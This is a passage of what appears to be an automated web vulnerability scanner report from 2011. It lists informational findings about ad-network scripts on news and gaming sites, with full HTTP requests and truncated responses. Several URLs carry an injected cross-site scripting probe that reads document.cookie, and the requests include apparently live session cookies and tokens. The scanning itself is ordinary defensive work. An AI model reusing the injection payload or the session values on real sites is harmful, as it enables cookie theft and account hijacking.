Cookie: icu=ChIIyaEDEAoYAiACKAIwveHX7wQQveHX7wQYAQ..; acb645526=![nC'kI/7Z208jSlb1@WvA.(S?enc=PDw8vLS0BEAAAACgmZkBQAAAAKCZmQFA_dR46SaxBUCF61G4HoUJQOtdn4PwOjpp_ayDGovBdy-98PVNAAAAAMf7BwACAgAANQEAAAIAAABpowUADB8BAAEAAABVU0QAVVNEANgCWgDwAgAA3w4BAgUCAQUAAAAAkiK-AQAAAAA.&tt_code=748066&udj=uf%28%27a%27%2C+15288%2C+1307963581%29%3Buf%28%27r%27%2C+369513%2C+1307963581%29%3Bppv%2811776%2C+%277582437727306472939%27%2C+1307963581%2C+1310555581%2C+62058%2C+73484%29%3B&cnd=!nSAXCQjq5AMQ6cYWGAAgjL4EMAA48AVAAEi1AlDH9x9YAGBVaABwAHgAgAGaAYgBFpABAZgBAaABA6gBA7ABAbkBmZmZwR6FCUDBAZmZmcEehQlAyQEzMzMzMzP3P9ABANkBAAAAAAAA8D_gAQA.&ccd=!NQVcLQjq5AMQ6cYWGIy-BCAA; sess=1; uuid2=3420415245200633085; anj=Kfu=8fG6Q/D>7)*0s]#%2L_'x%SEV/i#+=44FO?KN1Ipz=Rr7(nTDn(:^i3A^y9mc%vk4^v$yM3WW6G<5`8#q8qLS%.Gg5e[?T1^Q#wfy+>=#D+$s`c(4i[6K.]BEP%$)!].G3x0Ugl[k.@FC+W_hECb[7v:/v)7o'n((hXuS>:L?Wg4KG**/Qd4fR1Ox!Nj0reFd^e6F7/z4Q60)Bep_S01/TEx8MrH?Ndd1irwS?=d6/5Fml/alM2kt41pf67OGU#nuuJid`:>[95_PNPw*2S^*utjJsqu[qYF4WYQmiIaQ%PqxZX9gh2[Na3++6r?!<Xq:eB>*pFBZe2^P('_rT)@y#bYty')UOhM_3afV5I@^ugDsn11T'w'IQ74s9(D$?<YQm#FI0(7]8Vsi2KK!8LuQ^%V<>A7HsjFa08nA`5cGfJ#(Bi.i5pCUdFoX$R[vLvGu(6OGL6oY@=.c%-m8[G3ss%:`6GV7Qb'gw#F`ZgHsuQAk!?3BI9c4OzY?aS+!VCf/HK5[ZWZ#dkkKdVVB!'-qz+/oQx]eVr2Wc*gr5mdd=#7'f^3W8+lbf=mCa=vb/gbq5kXydBx[>

Response

18.171. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The page was loaded from a URL containing a query string:

http://ib.adnxs.com/ptj?member=514&size=728x90&referrer=http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%2522-alert(document.cookie)-%25225958ea17fd2=1&inv_code=748066&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D728x90%26s%3D748066%26r%3D1%26_salt%3D1188639314%26u%3Dhttp%253A%252F%252Fthesouthern.com%252Fsports%252Fbasketball%252Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%253Fc03b0%252522-alert%2528document.cookie%2529-%2525225958ea17fd2%253D1%26u%3Dhttp%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%2522-alert%28document.cookie%29-%25225958ea17fd2%3D1

The response contains the following link to another domain:

http://r.openx.net/set?pid=408c9df8-85fe-6893-4938-ccbfd204601e&rtb=3420415245200633085

Request

GET /ptj?member=514&size=728x90&referrer=http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%2522-alert(document.cookie)-%25225958ea17fd2=1&inv_code=748066&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D728x90%26s%3D748066%26r%3D1%26_salt%3D1188639314%26u%3Dhttp%253A%252F%252Fthesouthern.com%252Fsports%252Fbasketball%252Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%253Fc03b0%252522-alert%2528document.cookie%2529-%2525225958ea17fd2%253D1%26u%3Dhttp%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%2522-alert%28document.cookie%29-%25225958ea17fd2%3D1 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html?c03b0%22-alert(document.cookie)-%225958ea17fd2=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYBCAEKAQw0ICz7wQQ0ICz7wQYAw..; anj=Kfw)k>JS.m*cOUs+'x*9/fov!U?-XD/@T`Eo*G>j9p6Kr5j'_7CgzlO:Fvgpkp?4[v=vwq`X_dWeNwpF6L1pOp0@m=r]@w@qmB`wa.gANc?%+]4$8<B8`4]:lCT3*9!qMQcil4XYmQ8WsDzIs#O67VmMmo)bHHWI6ZNYX0a_OT4xLEJYuSASUz$!y`uCnDKOlRBQu-`F+^8q^'[id[S7lqL3SyxsCSr9%@'BHMj:vbN!%A^*8GRvRZzGKBXAg>XGd5%ZV[>#w8#[npwDqVVGb#*ghU%C%7=MVqC2pmBp[Pxux0V[OL(pbe9FyrT[y*nF0xYV^1(9^IA4Y5vQ.63A13Xwt4yzbGW.9sLBw[mW8s6J_PV-8*MjghNoq:MVp!i%g:7B+-LBCkWVYq_!7QJ2ltk?f[Ob[1Nft-Sn1ma>DD[PDURe)51Ox>N/si@JJM]yC]x.!/L]TZ*wZi@6w8U'aoF=ae0W!Uew.vN=.wG!rYe0n(oapLJIa%K^mCY1KfotBEb; sess=1; uuid2=3420415245200633085

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 14-Jun-2011 11:19:52 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sun, 11-Sep-2011 11:19:52 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb142304=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChEIs34QChgBIAEoATCP5NfvBAoSCMmhAxAKGAMgAygDMNjk1-8EENjk1-8EGAM.; path=/; expires=Sun, 11-Sep-2011 11:19:52 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb364660=![nC'kI/7Z208jSlb1@WTp.OE?enc=PDw8vLS0BEAAAACgmZkBQAAAAKCZmQFA_dR46SaxBUCF61G4HoUJQNX8NSufw8hS_ayDGovBdy9Y8vVNAAAAAMf7BwACAgAANQEAAAIAAABrowUADB8BAAEAAABVU0QAVVNEANgCWgDwAgAAiQQBAgUCAQUAAAAARyJ_BAAAAAA.&tt_code=748066&udj=uf%28%27a%27%2C+15288%2C+1307963992%29%3Buf%28%27r%27%2C+369515%2C+1307963992%29%3Bppv%2811776%2C+%275965232794844396757%27%2C+1307963992%2C+1310555992%2C+62058%2C+73484%29%3B&cnd=!lSCdBwjq5AMQ68YWGAAgjL4EMAA48AVAAEi1AlDH9x9YAGBVaABwAHgAgAGkAYgBApABAZgBAaABA6gBA7ABAbkBmZmZwR6FCUDBAZmZmcEehQlAyQEzMzMzMzP3P9ABANkBAAAAAAAA8D_gAQA.&ccd=!NwVuLQjq5AMQ68YWGIy-BCAA; path=/; expires=Tue, 14-Jun-2011 11:19:52 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)k=m<8a)J710Kt67a:_4*o.Z_63317X4A_CV#L8ht=0reumdiq`dRG%C$AF>^UD'dGmAzb!D*E=Y#)WZ0R#Hz)d5%N/*(7EnvZl'%CbFD'euYkZ%vu'7oeIUny=KW5ulnkFr]iu=hsPF2wJfSi1L3_2Yu6c*uagm<!ev@^J!'>%DnvN/XdT0vH*So-tadh*MHehfMhi4_F+l#7(uW[Rku(]]as#VXE7(u]OJftB>YK>'G?>MH%t<lq[K]H55I5V^UusrS%nM=eSnShwCk85B`$.E4^x1=Tl7K%tB`t4$p0>N%1K@L$EEy2d+>SzF)Cm@>?^GS$F=oKD7K6=b/+:1-3HwLXwtr'I(OOJn`pGPIem->[h#9OHVw'_xeG3`9%1-fcP_(U!1FEG7Vm$AuCto6_RSS-p9K6fJI]!8h]A-7$<JzhMWuJ:)lObw(fO-uWt/Dt)5sQoaSlSkim:_Aa8EFmKEH[kYx%(+]4Q91vJ^M)j$v*>EIM/g(xCQzFEO_fBprrz0uKLw3K)U#nAHJwYUQ9tJ/p^(8H>Xp*.A6YWDYL902ZxB=?MSPefD+%[$N_Wq)^xenZt@1kPWVl)TVqmhy0LuS_A4sF!c*P>)[YMkTf1:dDbCaf[n72Eg'FL^LwlI7[wZ`E$3%p*Pk%JCxTGnXB; path=/; expires=Sun, 11-Sep-2011 11:19:52 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 13 Jun 2011 11:19:52 GMT
Content-Length: 613

document.write('<scr'+'ipt type="text/javascript"src="http://ad.yieldmanager.com/imp?anmember=514&anprice=220&Z=728x90&s=748066&r=1&_salt=1188639314&u=http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketbal
...[SNIP]...
</scr'+'ipt>');document.write('<img src="http://r.openx.net/set?pid=408c9df8-85fe-6893-4938-ccbfd204601e&rtb=3420415245200633085" width="1" height="1"/>');

18.172. http://img.mediaplex.com/content/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.js

Issue detail

The page was loaded from a URL containing a query string:

http://img.mediaplex.com/content/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12309-129868-23636-1%3Fmpt%3D6245544&mpjs=rt.legolas-media.com%2Flgrt%3Fci%3D2%26ti%3D361&mpt=6245544&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b25/17/1e8/%2a/n%3B241904200%3B0-0%3B4%3B40342997%3B3454-728/90%3B42422626/42440413/1%3Bu%3Drmxli_3163700|surl_http%3A//thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3B%7Esscs%3D%3fhttp://ad.yieldmanager.com/clk?2,13%3Becb025846c58424b%3B13088ae1ef6,0%3B%3B%3B4270644083,mTsCACJqCwC3E5MAAAAAADPOJAAAAAAAAgAAAAYAAAAAAP8AAAACB4FnFAAAAAAAuowIAAAAAAA0RjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADx4gUAAAAAAAIAAwAAAAAA9R6uiDABAAAAAAAAADI0NjFiNzE2LTk1YWQtMTFlMC1hMjVlLWUzNmM1YTM3NjJiYQAAAAAAAAA=,,http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%22-alert%28document.cookie%29-%225958ea17fd2%3D1,

The response contains the following link to another domain:

http://ad.doubleclick.net/click;h=v8/3b25/17/1e8/*/n;241904200;0-0;4;40342997;3454-728/90;42422626/42440413/1;u=rmxli_3163700|surl_http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html;~sscs=?http://ad.yieldmanager.com/clk?2,13;ecb025846c58424b;13088ae1ef6,0;;;4270644083,mTsCACJqCwC3E5MAAAAAADPOJAAAAAAAAgAAAAYAAAAAAP8AAAACB4FnFAAAAAAAuowIAAAAAAA0RjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADx4gUAAAAAAAIAAwAAAAAA9R6uiDABAAAAAAAAADI0NjFiNzE2LTk1YWQtMTFlMC1hMjVlLWUzNmM1YTM3NjJiYQAAAAAAAAA=,,http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html?c03b0

Request

GET /content/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12309-129868-23636-1%3Fmpt%3D6245544&mpjs=rt.legolas-media.com%2Flgrt%3Fci%3D2%26ti%3D361&mpt=6245544&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b25/17/1e8/%2a/n%3B241904200%3B0-0%3B4%3B40342997%3B3454-728/90%3B42422626/42440413/1%3Bu%3Drmxli_3163700|surl_http%3A//thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3B%7Esscs%3D%3fhttp://ad.yieldmanager.com/clk?2,13%3Becb025846c58424b%3B13088ae1ef6,0%3B%3B%3B4270644083,mTsCACJqCwC3E5MAAAAAADPOJAAAAAAAAgAAAAYAAAAAAP8AAAACB4FnFAAAAAAAuowIAAAAAAA0RjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADx4gUAAAAAAAIAAwAAAAAA9R6uiDABAAAAAAAAADI0NjFiNzE2LTk1YWQtMTFlMC1hMjVlLWUzNmM1YTM3NjJiYQAAAAAAAAA=,,http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%22-alert%28document.cookie%29-%225958ea17fd2%3D1, HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?mTsCACJqCwC3E5MAAAAAADPOJAAAAAAAAgAAAAYAAAAAAP8AAAACB4FnFAAAAAAAuowIAAAAAAA0RjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADx4gUAAAAAAAIAAwAAAAAAUrgeheuRCECamZmZmZkKQM8tcer33BlAAAAAAAAAHEDQLXHq99wZQAAAAAAAABxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACOmofmodM-CgUplvRSzdlkmEMRVc6kOd6J3c5dAAAAAA==,,http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%22-alert%28document.cookie%29-%225958ea17fd2%3D1,Z%3D728x90%26_salt%3D1188639314%26anmember%3D514%26anprice%3D220%26r%3D1%26s%3D748066,2461b716-95ad-11e0-a25e-e36c5a3762ba
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=12309:23636/17038:20406/9966:1105/17550:1884/15017:13113/14302:40017/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:19:56 GMT
Server: Apache
Last-Modified: Fri, 27 May 2011 15:56:55 GMT
ETag: "63cd71-1097-4a443fca0bfc0"
Accept-Ranges: bytes
Content-Length: 7285
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
Write( mp_html );
else
document.write( mp_html );
} else if( !( navigator.appName && navigator.appName.indexOf("Netscape") >= 0 && navigator.appVersion.indexOf("2.") >= 0 ) ) {
document.write('<a href="http://ad.doubleclick.net/click;h=v8/3b25/17/1e8/*/n;241904200;0-0;4;40342997;3454-728/90;42422626/42440413/1;u=rmxli_3163700|surl_http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html;~sscs=?http://ad.yieldmanager.com/clk?2,13;ecb025846c58424b;13088ae1ef6,0;;;4270644083,mTsCACJqCwC3E5MAAAAAADPOJAAAAAAAAgAAAAYAAAAAAP8AAAACB4FnFAAAAAAAuowIAAAAAAA0RjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADx4gUAAAAAAAIAAwAAAAAA9R6uiDABAAAAAAAAADI0NjFiNzE2LTk1YWQtMTFlMC1hMjVlLWUzNmM1YTM3NjJiYQAAAAAAAAA=,,http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html?c03b0"-alert(document.cookie)-"5958ea17fd2=1,http://altfarm.mediaplex.com/ad/ck/12309-129868-23636-1?mpt=6245544" target="_blank"><img src="http://img-cdn.mediaplex.com/0/12309/129868/1361274_us_smb_q1w12_728x90_mcsft_firstserver_dtp1a.jpg" width="728" height="90" border="0" alt="">
...[SNIP]...

18.173. http://img.timeinc.net/time/rd/trunk/www/web/feds/j/articles.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.timeinc.net
Path:	/time/rd/trunk/www/web/feds/j/articles.js

Issue detail

The page was loaded from a URL containing a query string:

http://img.timeinc.net/time/rd/trunk/www/web/feds/j/articles.js?ver=1305673302

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/3475.tim/;sz=130x80;ord='+ord+'?
http://ad.doubleclick.net/jump/3475.tim/;sz=130x80;ord='+ord+'?

Request

GET /time/rd/trunk/www/web/feds/j/articles.js?ver=1305673302 HTTP/1.1
Host: img.timeinc.net
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 17 May 2011 20:36:31 GMT
ETag: "27f9-4dd2dc4f"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Mon, 13 Jun 2011 11:22:29 GMT
Content-Length: 10233
Connection: close

$.fn.timeSlideDrop = function(options){
   var $this = $(this);
   var $thisParent = $this.parent();
   var showFn = function() {
           settings.content.slideDown(settings.animSpeed, function() {
           set
...[SNIP]...
<div class="sponsoredAd"><a href="http://ad.doubleclick.net/jump/3475.tim/;sz=130x80;ord='+ord+'?"    target="_blank"><img src="http://ad.doubleclick.net/ad/3475.tim/;sz=130x80;ord='+ord+'?" /></a>
...[SNIP]...

18.174. http://k.collective-media.net/cmadj/cm.mtv/ent_010111 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://k.collective-media.net
Path:	/cmadj/cm.mtv/ent_010111

Issue detail

The page was loaded from a URL containing a query string:

http://k.collective-media.net/cmadj/cm.mtv/ent_010111;sz=728x90;net=cm;ord=[timestamp];env=ifr;ord1=388700;cmpgurl=http%253A//view.atdmt.com/PTR/iview/240321409/direct%253Bwi.1%253Bhi.1/01%253Frelocate%253Dhttp%253A//viacom.adbureau.net/AFTRSERVER/hserver//acc_random%253D379297/site%253Dmtv.mtvi/aamsz%253D728x90/?

The response contains the following link to another domain:

http://c.betrad.com/a/4.gif

Request

GET /cmadj/cm.mtv/ent_010111;sz=728x90;net=cm;ord=[timestamp];env=ifr;ord1=388700;cmpgurl=http%253A//view.atdmt.com/PTR/iview/240321409/direct%253Bwi.1%253Bhi.1/01%253Frelocate%253Dhttp%253A//viacom.adbureau.net/AFTRSERVER/hserver//acc_random%253D379297/site%253Dmtv.mtvi/aamsz%253D728x90/? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://viacom.adbureau.net/AFTRSERVER/hserver//acc_random=379297/site=mtv.mtvi/aamsz=728x90//ATCI=1305305557-4079447
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dc; JY57=332jXJ1Pqjj-HqZYNcOZJMDRxyMFbPVXvMReGdRQ2Q3tgRpc00YOW1w; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 13 Jun 2011 11:23:36 GMT
Content-Length: 9137
Connection: close
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Tue, 14-Jun-2011 11:23:36 GMT
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Mon, 20-Jun-2011 11:23:36 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Mon, 20-Jun-2011 11:23:36 GMT
Set-Cookie: targ=1; domain=collective-media.net; path=/; expires=Mon, 20-Jun-2011 11:23:36 GMT

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
es/g.pixel?sid=9226553863",false);var bap_rnd = Math.floor(Math.random()*100000);
var _bao = {
coid:44,
nid:546,
ad_h:90,
ad_w:728,
uqid:bap_rnd,
cps:'cm,dx,wfm,idgt,bz'
};
document.write('<img style="margin:0;padding:0;" border="0" width="0" height="0" src="http://c.betrad.com/a/4.gif" id="bap-pixel-'+bap_rnd+'"/>');
(function() {
if(document.getElementById('ba.js')) return;
document.write('<sc'+'ript id="ba.js" type="text/javascript" src="http://c.betrad.com/geo/ba.js">
...[SNIP]...

18.175. http://kotaku.com/static/ad_iframe.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://kotaku.com
Path:	/static/ad_iframe.php

Issue detail

The page was loaded from a URL containing a query string:

http://kotaku.com/static/ad_iframe.php?script_url=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fgm.kotaku%2Fpc%3Bptile%3D9%3Bsz%3D300x250%3Bord%3D45018742%3BmtfIFPath%3D%2Fassets%2Fvendor%2Fdoubleclick%2F%3Borigin%3Dkotaku%3F&rand=45018732&nocache=true

The response contains the following link to another domain:

http://ad.doubleclick.net/adj/gm.kotaku/pc;ptile=9;sz=300x250;ord=45018742;mtfIFPath=/assets/vendor/doubleclick/;origin=kotaku?

Request

GET /static/ad_iframe.php?script_url=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fgm.kotaku%2Fpc%3Bptile%3D9%3Bsz%3D300x250%3Bord%3D45018742%3BmtfIFPath%3D%2Fassets%2Fvendor%2Fdoubleclick%2F%3Borigin%3Dkotaku%3F&rand=45018732&nocache=true HTTP/1.1
Host: kotaku.com
Proxy-Connection: keep-alive
Referer: http://kotaku.com/5811225/a-game-of-thrones-isnt-a-game-at-all-without-sean-bean
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: form_token=2657e8908f9ae46a1cb78d3013a193f8; SESSID_GANJA=hihvlpkf05v94s50dg0dnk9gi4; usrev=43127; ganjaPostlistView=false; __qca=P0-1910528491-1307963900267; ____GSV=dynamic; GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; ad_url_login=0; ad_url_commenter=0; ad_url_star=0; SESSID_GANJA_hihvlpkf05v94s50dg0dnk9gi4_DATA=mail2token%7Ca%3A2%3A%7Bs%3A5%3A%22token%22%3Bs%3A32%3A%228e63e5a4b1a3ef859caf7e001b06aec6%22%3Bs%3A4%3A%22time%22%3Bi%3A1307963363%3B%7D; SESSID_GANJA_hihvlpkf05v94s50dg0dnk9gi4_CHK=31955d712532c281244ff18495a6c63d; welcome-box_count=1; interstitial_count=1; __utmz=153847911.1307963900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=153847911.155554980.1307963900.1307963900.1307963900.1; __utmc=153847911; __utmb=153847911.1.10.1307963900; __g_iut=1307963904980; _chartbeat2=e1yns63z64wh592f

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:23:25 GMT
Server: Apache
X-Cookie-Set: 1
Cache-Control: max-age=30
Pragma: no-cache
Expires: 1307964205
ETag: 212443
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
GawkerApplicationHost: Ganja
GawkerHost: GM38 - Request took D=707 at t=1307964205157644 on site kotaku.com (live)
GawkerApplication: ganja
Cteonnt-Length: 1324
Content-Type: text/html
Content-Length: 1324


<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
</script>
<script type="text/javascript" src="http://ad.doubleclick.net/adj/gm.kotaku/pc;ptile=9;sz=300x250;ord=45018742;mtfIFPath=/assets/vendor/doubleclick/;origin=kotaku?"></script>
...[SNIP]...

18.176. http://kotaku.com/static/ad_iframe.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://kotaku.com
Path:	/static/ad_iframe.php

Issue detail

The page was loaded from a URL containing a query string:

http://kotaku.com/static/ad_iframe.php?script_url=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fgm.kotaku%2Fpc%3Bptile%3D10%3Bsz%3D640x360%3Bord%3D56598520%3BmtfIFPath%3D%2Fassets%2Fvendor%2Fdoubleclick%2F%3Borigin%3Dkotaku%3F&rand=56598509&nocache=true

The response contains the following link to another domain:

http://ad.doubleclick.net/adj/gm.kotaku/pc;ptile=10;sz=640x360;ord=56598520;mtfIFPath=/assets/vendor/doubleclick/;origin=kotaku?

Request

GET /static/ad_iframe.php?script_url=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fgm.kotaku%2Fpc%3Bptile%3D10%3Bsz%3D640x360%3Bord%3D56598520%3BmtfIFPath%3D%2Fassets%2Fvendor%2Fdoubleclick%2F%3Borigin%3Dkotaku%3F&rand=56598509&nocache=true HTTP/1.1
Host: kotaku.com
Proxy-Connection: keep-alive
Referer: http://kotaku.com/5811225/a-game-of-thrones-isnt-a-game-at-all-without-sean-bean
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: form_token=2657e8908f9ae46a1cb78d3013a193f8; SESSID_GANJA=hihvlpkf05v94s50dg0dnk9gi4; usrev=43127; ganjaPostlistView=false; __qca=P0-1910528491-1307963900267; ____GSV=dynamic; GANJAUSERSETTINGS=a%3A1%3A%7Bs%3A3%3A%22css%22%3BN%3B%7D; ad_url_login=0; ad_url_commenter=0; ad_url_star=0; SESSID_GANJA_hihvlpkf05v94s50dg0dnk9gi4_DATA=mail2token%7Ca%3A2%3A%7Bs%3A5%3A%22token%22%3Bs%3A32%3A%228e63e5a4b1a3ef859caf7e001b06aec6%22%3Bs%3A4%3A%22time%22%3Bi%3A1307963363%3B%7D; SESSID_GANJA_hihvlpkf05v94s50dg0dnk9gi4_CHK=31955d712532c281244ff18495a6c63d; welcome-box_count=1; interstitial_count=1; __utmz=153847911.1307963900.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=153847911.155554980.1307963900.1307963900.1307963900.1; __utmc=153847911; __utmb=153847911.1.10.1307963900; __g_iut=1307963904980; _chartbeat2=e1yns63z64wh592f

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:18:30 GMT
Server: Apache
X-Cookie-Set: 1
Cache-Control: max-age=30
Pragma: no-cache
Expires: 1307963910
ETag: 358158
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
GawkerApplicationHost: Ganja
GawkerHost: GM67 - Request took D=2079 at t=1307963910787891 on site kotaku.com (live)
GawkerApplication: ganja
ntCoent-Length: 1325
Content-Type: text/html
Content-Length: 1325


<html lang="en">
